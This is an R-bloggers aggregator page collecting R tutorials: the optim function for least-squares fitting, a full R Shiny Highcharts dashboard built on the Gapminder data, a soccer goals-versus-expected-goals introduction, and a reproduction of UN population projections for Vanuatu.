R-bloggers

Test title

R Stories — Mon, 06 May 2024 00:00:00 +0000

[This article was first published on R Stories, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

To leave a comment for the author, please follow the link and comment on their blog: R Stories.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

optim Function in R

R Archives » Data Science Tutorials — Sun, 05 May 2024 09:43:14 +0000

[This article was first published on R Archives » Data Science Tutorials, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

The post optim Function in R appeared first on Data Science Tutorials

In this tutorial, we will explore how to perform general-purpose optimization using the optim function in the R programming language.

We will create example data and then demonstrate the usage of the optim function to minimize the residual sum of squares.

optim Function in R

First, let’s create the example data we will use for this tutorial:

# Set a random seed for reproducibility
set.seed(123)

# Create random data
x <- rnorm(500)
y <- rnorm(500) + 0.7 * x

# Combine x and y into a data frame
data <- data.frame(x, y)

# Print the head of the data
head(data)

This code generates a data frame with two numeric variables, x and y.

            x          y
1 -0.56047565 -0.9942258
2 -0.23017749 -1.1548228
3  1.55870831  2.1178809
4  0.07050839  0.8004172
5  0.12928774 -1.4186651
6  1.71506499  1.1053980

Example: Applying optim Function in R

Now, let’s apply the optim function to minimize the residual sum of squares. We will manually create a function for this purpose:

# Manually create a function for residual sum of squares
optm_function <- function(data, par) {
  with(data, sum((par[1] + par[2] * x - y)^2))
}

Next, we can use the optim function as shown below.

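The par argument specifies the initial values for the parameters to be optimized over, and the fn argument specifies the function to minimize. The data argument is not an argument of optim itself; optim forwards it through ... to our function, which is how the data frame reaches optm_function.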

We store the output of the optim function in the optim_output object:

# Applying optim
optim_output <- optim(par = c(0, 1),
                      fn = optm_function,
                      data = data)

Finally, we can visualize our results in a plot. We will compare the results of the optim function with those of a conventional linear model provided by the lm function:

# Set plot parameters
par(mfrow = c(1, 2))

# Plot results of the optim function
plot(data$x, data$y, main = "optim Function")
abline(optim_output$par[1], optim_output$par[2], col = "red")

# Plot results of the lm function
plot(data$x, data$y, main = "lm Function")
abline(lm(y ~ x, data), col = "green")

The resulting plot (Figure 1) should show that the optim and lm functions return essentially the same fitted line, indicating that our manual optimization with optim recovers the least-squares solution.
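As a numerical check alongside the plot, the following sketch refits the same model and prints the optim estimates next to the lm coefficients. The names rss_function, optim_fit, and lm_fit are illustrative and not part of the original post; the data-generating code is copied from the example above.

```r
# Recreate the example data from the tutorial
set.seed(123)
x <- rnorm(500)
y <- rnorm(500) + 0.7 * x
data <- data.frame(x, y)

# Residual sum of squares for intercept par[1] and slope par[2]
# (rss_function is an illustrative name, not part of the original post)
rss_function <- function(data, par) {
  with(data, sum((par[1] + par[2] * x - y)^2))
}

# optim's default method is Nelder-Mead, a derivative-free numerical search
optim_fit <- optim(par = c(0, 1), fn = rss_function, data = data)
lm_fit <- lm(y ~ x, data = data)

optim_fit$convergence   # 0 means optim reports successful completion
optim_fit$par           # numerical estimates of intercept and slope
coef(lm_fit)            # least-squares estimates from lm
optim_fit$value         # residual sum of squares at the optim solution
sum(resid(lm_fit)^2)    # residual sum of squares from lm
```

Because Nelder-Mead is an iterative search, the two sets of estimates should agree to a few decimal places rather than exactly.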

R Shiny Highcharts – How to Create Interactive and Animated Shiny Dashboards

Dario Radečić — Sun, 05 May 2024 07:00:20 +0000

[This article was first published on Tag: r - Appsilon | Enterprise R Shiny Dashboards, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Welcome to the third (and final) part of our R Highcharts article series. So far, you’ve learned how to make basic interactive charts, and how to make drilldown charts. These two articles are a must-read before going over this one, since today the focus will be on code rather than explanations.

After reading today’s piece, you’ll know how to create interactive and animated dashboards with the R Shiny Highcharts module – both through basic charts and drill-downs. We’ll also go over some basics of R Shiny, such as filtering and styling. Let’s dig in!

Exploring R Shiny Highcharts Dashboard Elements

The application we’re about to create will contain a couple of elements, so it’s a good idea to explain what’s where and what does what. It will be based on the Gapminder dataset, and will show information such as life expectancy, population, and GDP per continent, year, and country.

Here’s a sketch of the application:

Image 1 – Sketch of our application

As you can see, the application starts with a couple of filters. These allow the user to control the continent and start/end years. Not all values and charts will be affected by the year filters, as some of them will show only the most recent values (2007).

In the Latest stats section, you’ll see four boxes showing information on the number of countries and other various statistics for a given continent. The year filters won’t do anything to these boxes, as only the most recent values will be shown.

Below, we have two Summary stats charts. These will be a bar chart showing median life expectancy by year, and a line chart showing median GDP by year. These two are affected by both the continent and year filter values. It’s also worth noting that each value is a median across all countries in a continent, so individual countries can sit well above or below what the charts show.

And finally, we have the Drilldown section. It contains only one chart, which shows the most recent population of each country in a given continent. When you click on an individual bar, you’ll see that country’s population across the selected years. Neat!

Let’s start building the thing!

Building the R Shiny Highcharts Dashboard

This section will be quite code-intensive and will require fundamental R Shiny knowledge. If you’re a complete beginner, we recommend checking our library of Shiny articles first.

Let’s start with the easiest part – summary stats.

Summary Stats Cards

Truth be told, filters and summary stats have nothing to do with R Highcharts, but will take our dashboard to the next level. As mentioned before, we’re working with the Gapminder dataset, and the idea is to allow the user to select a continent and a year range from which the dashboard contents will get updated.

The Shiny app’s UI is divided into two parts – sidebarPanel() and mainPanel(). The first one contains all UI controls (filters), while the second one renders the contents.

Regarding filters, R’s unique() function is quite useful here, as it allows us to grab only the distinct values of a variable. For the year filters, we’ll remove the highest year from the start-year choices and the lowest year from the end-year choices.

The contents of mainPanel() are organized in a way that we have one container with four containers inside it – each of which contains one summary statistic.

As for the server(), we’re simply creating a reactive dataset that calculates the summary statistics based on the selected continent and then using renderText() to display the values for each summary statistics card.

Here’s the full code snippet:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        inputId = "inContinent",
        label = "Continent:",
        choices = unique(gapminder$continent),
        selected = "Europe"
      ),
      selectInput(
        inputId = "inYearMin",
        label = "Start year:",
        choices = head(unique(gapminder$year), -1),  # all years except the last
        selected = min(gapminder$year)
      ),
      selectInput(
        inputId = "inYearMax",
        label = "End year:",
        choices = tail(unique(gapminder$year), -1),  # all years except the first
        selected = max(gapminder$year)
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        tags$div(
          tags$p("#Countries"),
          textOutput(outputId = "outNCountries")
        ),
        tags$div(
          tags$p("Median life exp."),
          textOutput(outputId = "outMedLifeExp")
        ),
        tags$div(
          tags$p("Median population"),
          textOutput(outputId = "outMedPop")
        ),
        tags$div(
          tags$p("Median GDP"),
          textOutput(outputId = "outMedGDP")
        )
      ),
      width = 9
    )
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      summarise(
        nCountries = n_distinct(country),
        medianLifeExp = median(lifeExp),
        medianPopM = median(pop / 1e6),
        medianGDP = median(gdpPercap)
      )
  })
  
  output$outNCountries <- renderText({
    data_cards()$nCountries
  })
  output$outMedLifeExp <- renderText({
    paste(round(data_cards()$medianLifeExp, 1), "years")
  })
  output$outMedPop <- renderText({
    paste0(round(data_cards()$medianPopM, 2), "M")
  })
  output$outMedGDP <- renderText({
    paste0("$", round(data_cards()$medianGDP, 2))
  })
}


shinyApp(ui = ui, server = server)
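A note on building the year choices: a subsetting expression of the form x[1:length(x) - 1] is a common way to say "all but the last element", but it only works because of operator precedence and how R treats a zero index. The sketch below uses a literal years vector as a stand-in for unique(gapminder$year) (the variable names are illustrative) and shows head() and tail() as more explicit alternatives.

```r
# Stand-in for unique(gapminder$year): 1952 to 2007 in five-year steps
years <- seq(1952, 2007, by = 5)
n <- length(years)

# ':' binds tighter than '-', so this is (1:n) - 1, i.e. 0, 1, ..., n - 1
idx <- 1:n - 1
idx

# Index 0 is silently ignored, so the result is "all but the last year"
start_choices <- years[idx]

# More explicit equivalents
start_choices_explicit <- head(years, -1)  # drop the last element
end_choices_explicit <- tail(years, -1)    # drop the first element

identical(start_choices, start_choices_explicit)
```

Writing 1:(n - 1) with parentheses would also work, but head() and tail() state the intent directly and avoid the precedence question altogether.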

And here’s what the R Shiny Highcharts application looks like:

Image 2 – R Shiny Highcharts dashboard (1)

The values are there and correct, but we’d benefit tremendously from a bit of styling. Let’s introduce CSS next.

Basic Dashboard Styling

You can use both CSS and SCSS to style your R Shiny dashboards. We’ll stick with the first option.

Create a www/styles.css file and paste the following inside it:

@import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,700;1,400&display=swap');

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

body {
  font-family: 'Poppins', sans-serif;
  font-weight: 400;
}

.main-container {
  padding-top: 1rem;
}

.stat-card-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.stat-card {
  border: 2px solid #f2f2f2;
  border-bottom: 2px solid #0198f9;
  width: 100%;
  padding: 0.5rem 0 0.5rem 1rem;
}

.stat-card > p {
  text-transform: uppercase;
  color: #808080;
}

.stat-card > div.shiny-text-output {
  font-size: 3rem;
  font-weight: 700;
}

Long story short, this piece of code will change the overall font, reset a couple of styles, and make our dashboard nicer to look at.

The only problem is – the CSS file isn’t connected with R Shiny.

What you’ll need to do is add a link tag to the head of the application and reference our styles.css file (Shiny serves files from the www folder, so the path is relative to it). You’ll also want to add CSS class names to HTML elements by piping them into the tagAppendAttributes(class = "class-name") function.

Only the code in ui has changed; server() is identical to before:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        tags$div(
          tags$p("# Countries:"),
          textOutput(outputId = "outNCountries")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median life exp:"),
          textOutput(outputId = "outMedLifeExp")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median population:"),
          textOutput(outputId = "outMedPop")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median GDP:"),
          textOutput(outputId = "outMedGDP")
        ) %>% tagAppendAttributes(class = "stat-card")
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  ...
}


shinyApp(ui = ui, server = server)

Our R Shiny application is now significantly more appealing:

Image 3 – R Shiny Highcharts dashboard (2)

We now have everything needed to introduce some visualizations with Highcharts.
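As a side note on the class-assignment step in this section, the sketch below compares adding a class with tagAppendAttributes() against passing class directly as a named argument when the tag is created. It uses htmltools, the package behind Shiny's tag functions, so it can run without starting an app; the card contents and variable names are placeholders, not code from the dashboard.

```r
library(htmltools)  # provides tags and tagAppendAttributes()

# Class added after the tag is built, as in the dashboard code
card_piped <- tags$div(
  tags$p("Median GDP:"),
  tags$span("placeholder value")
) |> tagAppendAttributes(class = "stat-card")

# Class passed directly as a named argument
card_direct <- tags$div(
  class = "stat-card",
  tags$p("Median GDP:"),
  tags$span("placeholder value")
)

# Render both tags to HTML text to inspect the resulting markup
cat(as.character(card_piped), "\n")
cat(as.character(card_direct), "\n")
```

Both forms should produce a div carrying the stat-card class. Piping keeps the class next to the closing parenthesis, which some find easier to scan in deeply nested UI code; which one to use is mostly a matter of taste.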

Adding Basic R Highcharts

So far, we’ve successfully set the stage, so let’s dive into the good stuff now. This section will walk you through two basic Highcharts visualizations in R Shiny, and these will show the following:

Median life expectancy by year: For all countries in a selected continent and a selected year range.
Median GDP by year: Once again, the median is taken across all countries in the selected continent, for each year in the selected range.

You can work with Highcharts visualizations in R Shiny by calling the highchartOutput() function in ui. It accepts an outputId and an optional height parameter, so you can easily tweak the basic looks straight from R.

Down in server(), it’s a familiar situation (if you’ve been following along with the series). We have a new reactive expression, data_charts, that returns the filtered and aggregated life expectancy and GDP data. The renderHighchart() function is used to create a Highcharts visualization, and it accepts a block of familiar functions:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        ...
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      
      tags$div(
        tags$h3("Summary stats:"),
        tags$div(
          tags$div(
            highchartOutput(outputId = "chartLifeExpByYear",  height = 500)
          ) %>% tagAppendAttributes(class = "chart-card"),
          tags$div(
            highchartOutput(outputId = "chartGDPByYear", height = 500)
          ) %>% tagAppendAttributes(class = "chart-card")
        ) %>% tagAppendAttributes(class = "base-charts-container")
      ) %>% tagAppendAttributes(class = "card-container"),
      
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    ...
  })
  
  data_charts <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_by(year) %>%
      summarise(
        medianLifeExp = round(median(lifeExp), 1),
        medianGDP = round(median(gdpPercap), 2)
      )
  })
  
  
  output$outNCountries <- renderText({
    ...
  })
  output$outMedLifeExp <- renderText({
    ...
  })
  output$outMedPop <- renderText({
    ...
  })
  output$outMedGDP <- renderText({
    ...
  })
  
  output$chartLifeExpByYear <- renderHighchart({
    hchart(data_charts(), "column", hcaes(x = year, y = medianLifeExp), color = "#0198f9", name = "Median life expectancy") |>
      hc_title(text = "Median life expectancy by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "Life expectancy"))
  })
  
  output$chartGDPByYear <- renderHighchart({
    hchart(data_charts(), "line", hcaes(x = year, y = medianGDP), color = "#800000", name = "Median GDP") |>
      hc_title(text = "Median GDP by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "GDP"))
  })
}


shinyApp(ui = ui, server = server)

We’ve also added some CSS classes to app.R, so here’s the corresponding CSS code for them:

.card-container {
  padding-top: 2rem;
}

.base-charts-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.chart-card {
  border: 2px solid #f2f2f2;
  width: 50%;
}

And this is what the application looks like now:

Image 4 – R Shiny Highcharts dashboard (3)

Both charts look amazing, are fully interactive, and have a nice animation when first loading the dashboard or when refreshing the data.

The only thing left to do is to include a drilldown chart, so let’s go over that next.
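The filtering and aggregation inside data_charts can also be tried outside Shiny. The sketch below is a minimal version under stated assumptions: toy is a made-up miniature of the gapminder columns, and in_year_min and in_year_max are hypothetical stand-ins for input$inYearMin and input$inYearMax. selectInput() passes its value to the server as a character string, which is why the app converts with as.integer() before comparing against the year column.

```r
library(dplyr)

# Hypothetical miniature of the gapminder columns used by data_charts
toy <- data.frame(
  year    = c(1997L, 1997L, 1997L, 2002L, 2002L, 2002L, 2007L, 2007L, 2007L),
  lifeExp = c(70.1, 72.3, 75.0, 71.0, 73.5, 76.2, 72.4, 74.8, 77.9)
)

# Stand-ins for the select inputs, which arrive as character strings
in_year_min <- "2002"
in_year_max <- "2007"

toy_summary <- toy %>%
  # keep rows whose year lies in the inclusive range [min, max]
  filter(between(year, as.integer(in_year_min), as.integer(in_year_max))) %>%
  group_by(year) %>%
  # one median per remaining year
  summarise(medianLifeExp = round(median(lifeExp), 1))

toy_summary
```

With this toy data the 1997 rows are filtered out and one median per remaining year is returned, which mirrors what the charts receive each time a filter changes.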

Adding a Highcharts Drilldown Chart

A drilldown chart will allow the user to click on individual chart elements to see a new, drilled-down version of the visualization. In our case, we’ll have a per-country column chart of the population for a selected continent (only for the latest year) by default. When a column is clicked, a new column chart appears showing only the population for the clicked country through time.

Seems easy enough, but remember – we’ll need two datasets. The first one is for the default visualization, and the second is for the drilled-down chart. If you’ve read the previous article you already know what you need to do.

To recap, the drilled-down dataset needs a column of type list that contains the data that’ll be visible when a single column is clicked. The hc_drilldown() function is then used to enable drilldown mode.

Here’s the code:

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      selectInput(
        ...
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        ...
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      tags$div(
        ...
      ) %>% tagAppendAttributes(class = "card-container"),

      tags$div(
        tags$h3("Drilldown:"),
        tags$div(
          highchartOutput(outputId = "chartDrilldown", height = 500)
        ) %>% tagAppendAttributes(class = "chart-card chart-card-full")
      ) %>% tagAppendAttributes(class = "card-container"),
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    ...
  })
  
  data_charts <- reactive({
    ...
  })
  
  drilldown_chart_base_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      group_by(country) %>%
      summarise(
        pop = round(pop, 1)
      ) %>%
      arrange(desc(pop))
  })
  
  drilldown_chart_drilldown_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_nest(country) %>%
      mutate(
        id = country,
        type = "column",
        data = map(data, mutate, name = year, y = pop),
        data = map(data, list_parse)
      )
  })
  
  
  output$outNCountries <- renderText({
    ...
  })
  output$outMedLifeExp <- renderText({
    ...
  })
  output$outMedPop <- renderText({
    ...
  })
  output$outMedGDP <- renderText({
    ...
  })
  
  output$chartLifeExpByYear <- renderHighchart({
    ...
  })
  
  output$chartGDPByYear <- renderHighchart({
    ...
  })
  
  output$chartDrilldown <- renderHighchart({
    hchart(
      drilldown_chart_base_data(),
      "column",
      hcaes(x = country, y = pop, drilldown = country),
      name = "Population"
    ) %>%
      hc_drilldown(
        allowPointDrilldown = TRUE,
        series = list_parse(drilldown_chart_drilldown_data())
      ) |>
      hc_colors(c("#004c5f")) |>
      hc_title(text = "Population report", align = "left") |>
      hc_xAxis(title = list(text = "")) |>
      hc_yAxis(title = list(text = "Population"))
  })
}


shinyApp(ui = ui, server = server)

There’s only a slight addition needed in styles.css to make our chart card 100% wide:

.chart-card-full {
  width: 100%;
}

And that’s it – we have a finished R Shiny Highcharts dashboard now:

Image 5 – R Shiny Highcharts dashboard (4)

You can probably make it look better by tweaking the styles, but it does the job perfectly even in this state. Let’s make a brief recap next.
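To make the nested shape of the drilldown data easier to picture, here is a base R sketch that builds the same kind of structure by hand: one series per country, each with an id, a type, and a list of points with name and y. It does not call highcharter, and the toy data and variable names are hypothetical. In the app, group_nest(), map(), and list_parse() are used to produce this kind of structure from the full dataset.

```r
# Hypothetical miniature data: two countries, two years each
toy <- data.frame(
  country = c("A", "A", "B", "B"),
  year    = c(2002, 2007, 2002, 2007),
  pop     = c(10, 12, 20, 21)
)

# One drilldown series per country; its id must equal the value the
# top-level chart maps to `drilldown` (the country name here)
drilldown_series <- lapply(split(toy, toy$country), function(d) {
  list(
    id   = d$country[1],
    type = "column",
    data = lapply(seq_len(nrow(d)), function(i) {
      list(name = d$year[i], y = d$pop[i])
    })
  )
})
drilldown_series <- unname(drilldown_series)  # a plain, unnamed list of series

str(drilldown_series, max.level = 2)
```

The key design point is the id: clicking a column looks up the series whose id matches that column's drilldown value, so a mismatch between the two typically means the click does nothing.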

Full Source Code

In case you’ve missed something or just want to copy/paste the code, this section is for you.

`app.R`

library(shiny)
library(dplyr)
library(purrr)
library(gapminder)
library(highcharter)


ui <- fluidPage(
  tags$head(
    tags$link(rel = "stylesheet", type = "text/css", href = "styles.css")
  ),
  sidebarLayout(
    sidebarPanel(
      titlePanel("R Shiny Highcharts"),
      selectInput(
        inputId = "inContinent",
        label = "Continent:",
        choices = unique(gapminder$continent),
        selected = "Europe"
      ),
      selectInput(
        inputId = "inYearMin",
        label = "Start year:",
        choices = head(unique(gapminder$year), -1),  # all years except the last
        selected = min(gapminder$year)
      ),
      selectInput(
        inputId = "inYearMax",
        label = "End year:",
        choices = tail(unique(gapminder$year), -1),  # all years except the first
        selected = max(gapminder$year)
      ),
      width = 3
    ),
    mainPanel(
      tags$h3("Latest stats:"),
      tags$div(
        tags$div(
          tags$p("# Countries:"),
          textOutput(outputId = "outNCountries")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median life exp:"),
          textOutput(outputId = "outMedLifeExp")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median population:"),
          textOutput(outputId = "outMedPop")
        ) %>% tagAppendAttributes(class = "stat-card"),
        tags$div(
          tags$p("Median GDP:"),
          textOutput(outputId = "outMedGDP")
        ) %>% tagAppendAttributes(class = "stat-card")
      ) %>% tagAppendAttributes(class = "stat-card-container"),
      tags$div(
        tags$h3("Summary stats:"),
        tags$div(
          tags$div(
            highchartOutput(outputId = "chartLifeExpByYear", height = 500)
          ) %>% tagAppendAttributes(class = "chart-card"),
          tags$div(
            highchartOutput(outputId = "chartGDPByYear", height = 500)
          ) %>% tagAppendAttributes(class = "chart-card")
        ) %>% tagAppendAttributes(class = "base-charts-container")
      ) %>% tagAppendAttributes(class = "card-container"),
      tags$div(
        tags$h3("Drilldown:"),
        tags$div(
          highchartOutput(outputId = "chartDrilldown", height = 500)
        ) %>% tagAppendAttributes(class = "chart-card chart-card-full")
      ) %>% tagAppendAttributes(class = "card-container"),
      width = 9
    ) %>% tagAppendAttributes(class = "main-container")
  )
)

server <- function(input, output) {
  data_cards <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      summarise(
        nCountries = n_distinct(country),
        medianLifeExp = median(lifeExp),
        medianPopM = median(pop / 1e6),
        medianGDP = median(gdpPercap)
      )
  })
  
  data_charts <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_by(year) %>%
      summarise(
        medianLifeExp = round(median(lifeExp), 1),
        medianGDP = round(median(gdpPercap), 2)
      )
  })
  
  drilldown_chart_base_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        year == max(year)
      ) %>%
      group_by(country) %>%
      summarise(
        pop = round(pop, 1)
      ) %>%
      arrange(desc(pop))
  })
  
  drilldown_chart_drilldown_data <- reactive({
    gapminder %>%
      filter(
        continent == input$inContinent,
        between(year, as.integer(input$inYearMin), as.integer(input$inYearMax))
      ) %>%
      group_nest(country) %>%
      mutate(
        id = country,
        type = "column",
        data = map(data, mutate, name = year, y = pop),
        data = map(data, list_parse)
      )
  })
  
  
  output$outNCountries <- renderText({
    data_cards()$nCountries
  })
  output$outMedLifeExp <- renderText({
    paste(round(data_cards()$medianLifeExp, 1), "years")
  })
  output$outMedPop <- renderText({
    paste0(round(data_cards()$medianPopM, 2), "M")
  })
  output$outMedGDP <- renderText({
    paste0("$", round(data_cards()$medianGDP, 2))
  })
  
  output$chartLifeExpByYear <- renderHighchart({
    hchart(data_charts(), "column", hcaes(x = year, y = medianLifeExp), color = "#0198f9", name = "Median life expectancy") |>
      hc_title(text = "Median life expectancy by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "Life expectancy"))
  })
  
  output$chartGDPByYear <- renderHighchart({
    hchart(data_charts(), "line", hcaes(x = year, y = medianGDP), color = "#800000", name = "Median GDP") |>
      hc_title(text = "Median GDP by year", align = "left") |>
      hc_xAxis(title = list(text = "Year")) |>
      hc_yAxis(title = list(text = "GDP"))
  })
  
  output$chartDrilldown <- renderHighchart({
    hchart(
      drilldown_chart_base_data(),
      "column",
      hcaes(x = country, y = pop, drilldown = country),
      name = "Population"
    ) %>%
      hc_drilldown(
        allowPointDrilldown = TRUE,
        series = list_parse(drilldown_chart_drilldown_data())
      ) |>
      hc_colors(c("#004c5f")) |>
      hc_title(text = "Population report", align = "left") |>
      hc_xAxis(title = list(text = "")) |>
      hc_yAxis(title = list(text = "Population"))
  })
}


shinyApp(ui = ui, server = server)

`www/styles.css`

@import url('https://fonts.googleapis.com/css2?family=Poppins:ital,wght@0,700;1,400&display=swap');

* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}

body {
  font-family: 'Poppins', sans-serif;
  font-weight: 400;
}

.main-container {
  padding-top: 1rem;
}

.stat-card-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.stat-card {
  border: 2px solid #f2f2f2;
  border-bottom: 2px solid #0198f9;
  width: 100%;
  padding: 0.5rem 0 0.5rem 1rem;
}

.stat-card > p {
  text-transform: uppercase;
  color: #808080;
}

.stat-card > div.shiny-text-output {
  font-size: 3rem;
  font-weight: 700;
}

.card-container {
  padding-top: 2rem;
}

.base-charts-container {
  display: flex;
  justify-content: space-between;
  column-gap: 1rem;
}

.chart-card {
  border: 2px solid #f2f2f2;
  width: 50%;
}

.chart-card-full {
  width: 100%;
}

Summing up R Shiny Highcharts

This article concludes our three-part series on R Highcharts. You’ve learned how to make basic interactive visualizations, how to make drilldown charts, and today, how to tie it all together with R Shiny. You now have everything needed to leverage Highcharts on your next project or to build an impressive resume of Shiny applications.

Today’s article was a bit heavier on the code and lighter on explanations – that’s because you already know how things work, and our resulting app has a fair amount of reactive code. We hope it was easy enough to follow, but make sure to pop your question(s) in the comment section below if anything is not 100% clear.

As always, thanks for reading, and stay tuned to the Appsilon blog and our newsletter, Shiny Weekly to learn more about R/Shiny.

The post appeared first on appsilon.com/blog/.

Estimating Shooting Performance Unlikeliness

Tony ElHabr — Sun, 05 May 2024 05:00:00 +0000

[This article was first published on Tony's Blog, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Introduction

Towards the end of each soccer season, we naturally start to look back at player stats, often looking to see who has performed worse compared to their past seasons. We may have different motivations for doing so–e.g. we may be trying to attribute team under-performance to individuals, we may be hypothesizing who is likely to be transferred or resigned, etc.

It’s not uncommon to ask “How unlikely was their shooting performance this season?” when looking at a player who has scored fewer goals than expected.¹ For instance, if a striker only scores 9 goals on 12 expected goals (xG), their “underperformance” of 3 goals jumps off the page.

The “Outperformance” ($O$) ratio, the ratio of a player $p$’s goals $G_p$ to expected goals $xG_p$, written $O_p = G_p / xG_p$, is a common way of evaluating a player’s shooting performance.²

An $O_p$ ratio of 1 indicates that a player is scoring as many goals as expected; a ratio greater than 1 indicates overperformance; and a ratio less than 1 indicates underperformance. Our hypothetical player underperformed with $O_p = 9 / 12 = 0.75$.

In most cases, we have prior seasons of data to use when evaluating a player’s $O_p$ ratio for a given season. For example, let’s say our hypothetical player scored 14 goals on 10 xG ($O_p = 1.4$) in the season prior, and 12 goals on 8 xG ($O_p = 1.5$) before that. An $O_p = 0.75$ after those seasons seems fairly unlikely, especially compared to an “average” player who theoretically achieves an $O_p = 1$ ratio every year.

So how do we put a number on the unlikeliness of that $O_p = 0.75$ for our hypothetical player, accounting for their prior season-long performances?
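For concreteness, the ratio of goals to expected goals for the hypothetical player's three seasons can be computed as follows. This is only a sketch of the arithmetic in the text; the data frame, its column names, and the season labels are made up for illustration and are not taken from the author's code.

```r
# Hypothetical player from the text: goals and expected goals (xG) by season
seasons <- data.frame(
  season = c("two seasons ago", "last season", "this season"),
  goals  = c(12, 14, 9),
  xg     = c(8, 10, 12)
)

# Outperformance ratio: goals divided by expected goals
seasons$o_ratio <- seasons$goals / seasons$xg

# Goals above (positive) or below (negative) expectation
seasons$g_minus_xg <- seasons$goals - seasons$xg

seasons
```

The ratios come out as 1.5, 1.4, and 0.75, so the current season is the only one below 1, and the drop from the prior seasons is what the rest of the analysis tries to quantify.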

Data

I’ll be using public data from FBref for the 2018/19 – 2023/24 seasons of the Big Five European soccer leagues, updated through April 25. Fake data is nice for examples, but ultimately we want to test our methods on real data. Our intuition can be a useful gauge of how sensible the results are.

Get shot data

Reproducing and adapting the UN Population Projections by @ellis2013nz

free range statistics - R — Sun, 05 May 2024 00:00:00 +0000

[This article was first published on free range statistics - R, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

I set out to see if it was possible to reproduce the UN’s 2022 Revision of World Population Prospects for a given country by cohort component projection from the fertility, mortality and migration rates and population starting point published as part of their projection. The motivation is to make small changes to some of those parameters (for example by substituting in a recent census result for the population in a given year) and “re-run” the projections to see the impact of changes, or to get a more up-to-date version with data that wasn’t available to the UN at the time of their projection.

It turns out this wasn’t too hard (one morning’s work for the modelling, then a few hours of write-up), particularly in cases where migration is small in the projection period. I was able to reproduce almost exactly population, birth and death totals to 2100 for Vanuatu, and demonstrate the impact of updating the 2020 year for their recent census population totals and fertility rates, and getting a slightly lower projection as a result.

Here’s my reproduction of Vanuatu’s population projection from 2020 to 2100, using just the 2020 population totals and the forecast fertility, mortality and migration rates. As you can see it’s basically identical to the UN totals:

And here’s the same method tweaked for the actual 2020 census total and with a rough adjustment made to fertility rates based on what was observed at the 2020 census:

Of course, this method delivers a full set of projections by age and sex, and we could construct life tables or any indicators we want from it. Here are population pyramids comparing the published UN projections for 2050 with my revised set. Not visually stunning in its comparison, but enough to prove that it’s possible:

Reproducing UN projections

So here’s how I went about that.

